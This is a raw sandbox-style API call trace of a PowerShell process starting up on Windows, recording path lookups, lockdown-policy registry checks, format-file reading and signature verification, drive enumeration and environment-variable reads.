	[0045.186] GetSystemDirectoryW (in: lpBuffer=0x1505f3b6bb0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.186] CoTaskMemFree (pv=0x1505f3b6bb0) 
	[0045.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0045.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0045.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cef0) returned 1
	[0045.186] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cfd0 | out: lpFileInformation=0x184b47cfd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0045.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ceb0) returned 1
	[0045.186] WldpGetLockdownPolicy () returned 0x0
	[0045.186] GetSystemInfo (in: lpSystemInfo=0x184b47d030 | out: lpSystemInfo=0x184b47d030*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0045.186] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cf38 | out: phkResult=0x184b47cf38*=0x3d8) returned 0x0
	[0045.187] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf88, lpData=0x0, lpcbData=0x184b47cf80*=0x0 | out: lpType=0x184b47cf88*=0x0, lpData=0x0, lpcbData=0x184b47cf80*=0x0) returned 0x2
	[0045.187] RegCloseKey (hKey=0x3d8) returned 0x0
	[0045.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0045.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf60) returned 1
	[0045.187] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0045.187] GetFileType (hFile=0x3d8) returned 0x1
	[0045.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0045.187] GetFileType (hFile=0x3d8) returned 0x1
	[0045.187] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x0
	[0045.187] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504797fad0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504797fad0*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.188] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1000
	[0045.188] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504797fad0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504797fad0*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.188] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2000
	[0045.188] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504797fad0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504797fad0*, lpNumberOfBytesRead=0x184b47cf98*=0x10a, lpOverlapped=0x0) returned 1
	[0045.188] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x210a
	[0045.189] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504797fad0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504797fad0*, lpNumberOfBytesRead=0x184b47cf98*=0x0, lpOverlapped=0x0) returned 1
	[0045.189] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6bb0
	[0045.189] GetSystemDirectoryW (in: lpBuffer=0x1505f3b6bb0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.189] CoTaskMemFree (pv=0x1505f3b6bb0) 
	[0045.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0045.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0045.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ceb0) returned 1
	[0045.189] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf90 | out: lpFileInformation=0x184b47cf90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0045.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce70) returned 1
	[0045.189] WldpGetLockdownPolicy () returned 0x0
	[0045.189] GetSystemInfo (in: lpSystemInfo=0x184b47cff0 | out: lpSystemInfo=0x184b47cff0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0045.189] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cef8 | out: phkResult=0x184b47cef8*=0x5b8) returned 0x0
	[0045.189] RegQueryValueExW (in: hKey=0x5b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf48, lpData=0x0, lpcbData=0x184b47cf40*=0x0 | out: lpType=0x184b47cf48*=0x0, lpData=0x0, lpcbData=0x184b47cf40*=0x0) returned 0x2
	[0045.189] RegCloseKey (hKey=0x5b8) returned 0x0
	[0045.189] CloseHandle (hObject=0x3d8) returned 1
	[0045.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0045.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf10) returned 1
	[0045.189] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x15047987c30 | out: lpFileInformation=0x15047987c30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x210a)) returned 1
	[0045.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0045.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0045.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ce80) returned 1
	[0045.190] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf60 | out: lpFileInformation=0x184b47cf60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x210a)) returned 1
	[0045.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce40) returned 1
	[0045.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0045.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0045.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0045.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cd60) returned 1
	[0045.190] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47ce40 | out: lpFileInformation=0x184b47ce40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x210a)) returned 1
	[0045.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cd20) returned 1
	[0045.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0045.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ccf0) returned 1
	[0045.190] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0045.190] GetFileType (hFile=0x3d8) returned 0x1
	[0045.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cc60) returned 1
	[0045.190] GetFileType (hFile=0x3d8) returned 0x1
	[0045.190] WTGetSignatureInfo () returned 0x0
	[0045.213] CertDuplicateCertificateContext (pCertContext=0x1505fba7da0) returned 0x1505fba7da0
	[0045.213] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cd88 | out: phkResult=0x184b47cd88*=0x5c8) returned 0x0
	[0045.213] RegQueryValueExW (in: hKey=0x5c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x0, lpcbData=0x184b47cdd0*=0x0 | out: lpType=0x184b47cdd8*=0x1, lpData=0x0, lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0045.213] RegQueryValueExW (in: hKey=0x5c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x15047988840, lpcbData=0x184b47cdd0*=0x56 | out: lpType=0x184b47cdd8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0045.213] RegCloseKey (hKey=0x5c8) returned 0x0
	[0045.213] CoTaskMemAlloc (cb=0x10) returned 0x1505fb069b0
	[0045.213] CoTaskMemAlloc (cb=0x50) returned 0x1505f4651c0
	[0045.213] WinVerifyTrust () returned 0x0
	[0045.213] CoTaskMemFree (pv=0x1505f4651c0) 
	[0045.213] CoTaskMemFree (pv=0x1505fb069b0) 
	[0045.213] CertFreeCertificateContext (pCertContext=0x1505fba7da0) returned 1
	[0045.213] CloseHandle (hObject=0x3d8) returned 1
	[0045.214] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b8970
	[0045.214] GetSystemDirectoryW (in: lpBuffer=0x1505f3b8970, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.214] CoTaskMemFree (pv=0x1505f3b8970) 
	[0045.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0045.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0045.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cfa0) returned 1
	[0045.215] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47d080 | out: lpFileInformation=0x184b47d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0045.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cf60) returned 1
	[0045.215] WldpGetLockdownPolicy () returned 0x0
	[0045.215] GetSystemInfo (in: lpSystemInfo=0x184b47d0e0 | out: lpSystemInfo=0x184b47d0e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0045.215] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cfe8 | out: phkResult=0x184b47cfe8*=0x3d8) returned 0x0
	[0045.215] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47d038, lpData=0x0, lpcbData=0x184b47d030*=0x0 | out: lpType=0x184b47d038*=0x0, lpData=0x0, lpcbData=0x184b47d030*=0x0) returned 0x2
	[0045.215] RegCloseKey (hKey=0x3d8) returned 0x0
	[0045.215] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xf70706d8, Data2=0x5009, Data3=0x415b, Data4=([0]=0x93, [1]=0xed, [2]=0x9, [3]=0x3, [4]=0x6e, [5]=0xc0, [6]=0x49, [7]=0x7e))) returned 0x0
	[0045.217] GetLogicalDrives () returned 0x2000004
	[0045.217] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x184b47cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0045.217] GetFullPathNameW (in: lpFileName="Z:\\.", nBufferLength=0x105, lpBuffer=0x184b47cbc0, lpFilePart=0x0 | out: lpBuffer="Z:\\", lpFilePart=0x0) returned 0x3
	[0045.219] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x184b47cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0045.219] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0045.219] GetFullPathNameW (in: lpFileName="Z:\\.", nBufferLength=0x105, lpBuffer=0x184b47cbc0, lpFilePart=0x0 | out: lpBuffer="Z:\\", lpFilePart=0x0) returned 0x3
	[0045.219] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x4
	[0045.220] CoTaskMemAlloc (cb=0x25c) returned 0x1505f3ceac0
	[0045.220] GetCurrentDirectoryW (in: nBufferLength=0x12c, lpBuffer=0x1505f3ceac0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0045.220] CoTaskMemFree (pv=0x1505f3ceac0) 
	[0045.221] CoTaskMemAlloc (cb=0x25c) returned 0x1505f3ceac0
	[0045.221] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505f3ceac0, nSize=0x12c | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x0
	[0045.221] CoTaskMemFree (pv=0x1505f3ceac0) 
	[0045.221] CoTaskMemAlloc (cb=0x25c) returned 0x1505f3cd9b0
	[0045.221] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505f3cd9b0, nSize=0x12c | out: lpBuffer="\x03") returned 0x0
	[0045.221] CoTaskMemFree (pv=0x1505f3cd9b0) 
	[0045.222] CoTaskMemAlloc (cb=0x25c) returned 0x1505f3cd740
	[0045.222] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505f3cd740, nSize=0x12c | out: lpBuffer="\x03") returned 0x0
	[0045.222] CoTaskMemFree (pv=0x1505f3cd740) 
	[0045.226] CoTaskMemAlloc (cb=0x25c) returned 0x1505f3ceac0
	[0045.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505f3ceac0, nSize=0x12c | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x0
	[0045.226] CoTaskMemFree (pv=0x1505f3ceac0) 
	[0045.234] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11
	[0045.235] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0x184b47cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0045.236] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11
	[0045.236] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11
	[0045.236] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x184b47cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0045.236] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x184b47cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0045.237] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi" (normalized: "c:\\users\\nd9e1fyi")) returned 0x10
	[0045.237] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi" (normalized: "c:\\users\\nd9e1fyi")) returned 0x10
	[0045.237] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi", nBufferLength=0x105, lpBuffer=0x184b47cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0045.237] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\.", nBufferLength=0x105, lpBuffer=0x184b47cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0045.237] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11
	[0045.237] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11
	[0045.237] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0x184b47cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0045.237] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x184b47cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0045.239] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11
	[0045.242] ReportEventW (hEventLog=0x1505f5b0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x150479b68c8*="Available", lpRawData=0x150479b6730) returned 1
	[0045.258] CoTaskMemAlloc (cb=0x25c) returned 0x1505f3cd260
	[0045.258] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x1505f3cd260, nSize=0x12c | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x11
	[0045.258] CoTaskMemFree (pv=0x1505f3cd260) 
	[0045.258] GetCurrentProcessId () returned 0xff8
	[0045.260] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d428 | out: phkResult=0x184b47d428*=0x3d8) returned 0x0
	[0045.260] RegQueryValueExW (in: hKey=0x3d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47d478, lpData=0x0, lpcbData=0x184b47d470*=0x0 | out: lpType=0x184b47d478*=0x1, lpData=0x0, lpcbData=0x184b47d470*=0x56) returned 0x0
	[0045.260] RegQueryValueExW (in: hKey=0x3d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47d478, lpData=0x150479c2a90, lpcbData=0x184b47d470*=0x56 | out: lpType=0x184b47d478*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47d470*=0x56) returned 0x0
	[0045.260] RegCloseKey (hKey=0x3d8) returned 0x0
	[0045.261] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d438 | out: phkResult=0x184b47d438*=0x3d8) returned 0x0
	[0045.261] RegQueryValueExW (in: hKey=0x3d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47d488, lpData=0x0, lpcbData=0x184b47d480*=0x0 | out: lpType=0x184b47d488*=0x1, lpData=0x0, lpcbData=0x184b47d480*=0x56) returned 0x0
	[0045.261] RegQueryValueExW (in: hKey=0x3d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47d488, lpData=0x150479c3528, lpcbData=0x184b47d480*=0x56 | out: lpType=0x184b47d488*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47d480*=0x56) returned 0x0
	[0045.261] RegCloseKey (hKey=0x3d8) returned 0x0
	[0045.261] CoTaskMemAlloc (cb=0x25c) returned 0x1505f3ceac0
	[0045.262] GetCurrentDirectoryW (in: nBufferLength=0x12c, lpBuffer=0x1505f3ceac0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0045.262] CoTaskMemFree (pv=0x1505f3ceac0) 
	[0045.262] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11
	[0045.262] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0x184b47cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0045.263] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11
	[0045.263] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11
	[0045.263] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x184b47cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0045.263] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x184b47cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0045.263] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi" (normalized: "c:\\users\\nd9e1fyi")) returned 0x10
	[0045.263] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi" (normalized: "c:\\users\\nd9e1fyi")) returned 0x10
	[0045.263] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi", nBufferLength=0x105, lpBuffer=0x184b47cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0045.263] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\.", nBufferLength=0x105, lpBuffer=0x184b47cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0045.263] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11
	[0045.263] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11
